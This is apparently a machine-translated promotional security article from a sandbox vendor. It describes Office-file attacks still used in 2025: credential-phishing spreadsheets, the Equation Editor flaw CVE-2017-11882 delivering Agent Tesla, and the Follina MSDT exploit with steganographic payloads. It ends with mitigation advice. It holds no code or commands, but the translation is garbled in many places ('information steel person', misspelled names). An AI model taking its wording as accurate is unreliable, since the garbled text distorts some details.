Hackers have long used word and Excel documents as malware delivery vehicles, but in 2025 these tricks are far from outdated. From phishing schemes to zero click exploits, malicious office files are one of the easiest ways to victims’ systems.
This is Microsoft’s office-based exploits of the year, as well as the top three exploits that still do what you need to know to avoid.
1. MS Office Phishing: Still Hacker’s Favorites
Phishing attacks using Microsoft Office files have been around for years and are still strong. why? They are especially because the team works in a business environment where the language is always exchanged and documented.
Attackers know that people are used to opening office files, especially when they come from what appears to be coworkers, clients, or partners. Fake invoices, shared reports, or recruitment: It doesn’t take long to convince someone to click. And once the file opens, the attacker has a chance.
Office files phishing is often intended to steal login credentials. These documents include:
Fake Microsoft Links 365 Login Pages Phishing portals that mimic company tools and services
In this any.run malware analysis session, the Excel file contains malicious phishing links.
View analysis sessions using Excel files
Excel file containing malicious links detected in any.run sandbox
Clicking on the victim will take you to a webpage that shows the Cloudfelae “Check You Are Human” check.
CloudFlare validation was passed with automatic interactivity in any.run
After clicking, you will have another redirect. This time we’re on the fake Microsoft login page.
Malicious link to fake Microsoft login page with random characters
At first glance, it may look real. However, inside any.run sandbox, you can easily find the red flag. The Microsoft login URL is not official. Filled with random characters, it clearly does not belong to Microsoft’s domain.
Provide your team with the right tools to detect, investigate and report threats faster in a safe environment.
Get a trial version of any.run for access to advanced malware analysis
This fake login page unconsciously conveys the login credentials directly to the attacker.
The attackers are also becoming more creative. Recently, some phishing documents have embedded QR codes. These are scanned on smartphones and are intended to send victims to phishing websites and trigger malware downloads. However, it can also be detected and analyzed with tools like any.run sandbox.
2. CVE-2017-11882: Abuse of the Equation Editor Who Doesn’t Die
First discovered in 2017, CVE-2017-11882 is still used today in an environment running an outdated version of Microsoft Office.
This vulnerability targets Microsoft Equation Editor. This is a rarely used component that is part of an older office build. It is dangerous to misuse it. Simply opening a malicious word file can trigger an exploit. Macros, no additional clicks are required.
In this case, the attacker uses the flaw, often downloading and running the malware payload in the background, over a remote server connection.
In our analysis session, the delivered payload was Agent Tesla, a known information steel person used to capture keystrokes, credentials, and clipboard data.
View analysis sessions with malicious payloads
Phishing email containing malicious Excel attachments
In the MITER ATT & CK section of this analysis, you can see how Any.Run Sandbox is detected this particular technique used in the attack.
Utilizing equation editors detected by any.run
Microsoft patched the vulnerability years ago, but it still serves an attacker targeting unupdated systems. And because macros are disabled by default in the new office version, CVE-2017-11882 has become a fallback for cybercriminals who want to ensure execution.
3. CVE-2022-30190: Folina is still in the game
Follina Exploit (CVE-2022-30190) remains a favorite among attackers for one simple reason. It works without macros and requires no user interaction other than opening word files.
Follina abuses special URLs built into Microsoft Support Diagnostic Tools (MSDT) and office documents to run remote code. This means that you can simply view the file, and often launch a malicious PowerShell-based script, and contact the command and control server.
View your analysis session with Follina
Folina Techniques Detected in any.run Sandbox
The attacks have gone a step further with the malware analysis sample. I observed the “Stegocampaign” tag. This illustrates the use of steganography, a technique in which malware is hidden within image files.
Using steganography in attacks
Images are downloaded and processed using PowerShell to extract the actual payload without raising an immediate alarm.
Images with malicious payloads analyzed within any.run
Worse, Folina is often used in multi-stage attack chains, combining other vulnerabilities and payloads to increase their impact.
What does this mean for teams using MS Office?
If your team relies heavily on Microsoft’s office for its day-to-day operations, the above attacks should be a wake-up call.
Cyber Criminal knows that office files are trusted and widely used in business. So they continue to exploit them. Whether it’s a simple Excel sheet that hides phishing links or a word document that silently runs malicious code, these files can pose a serious risk to your organization’s security.
This is what your team can do:
See how office documents are processed internally. Limits whether files can be opened or downloaded from external sources. Use tools like any.run sandbox to inspect suspicious files in a safe, isolated environment before anyone on your team opens. Update all office software regularly and disable legacy features such as macros and equation editors when possible. Let us know about new exploit techniques tied to an office style so that your security team can respond quickly.
Analyze mobile malware with any.run’s new Android OS support
The threat doesn’t stop at the office files. Nowadays, mobile devices are becoming important targets, with attackers spreading malware through fake apps, phishing links and malicious APKs.
This implies an increased attack surface for businesses and a need for wider visibility.
With any.run’s new Android OS support, your security team can do it right away.
Analytics of Android malware in real mobile environments investigate suspicious APK behavior before production devices respond to mobile threats in both desktop and mobile ecosystems to support mobile threats more clearly and support incident responses
This is a big step towards full coverage and is available on all plans, including free.
Start your first Android threat analysis and provide security analysts with the visibility they need to protect the surface of mobile attacks.
Source link
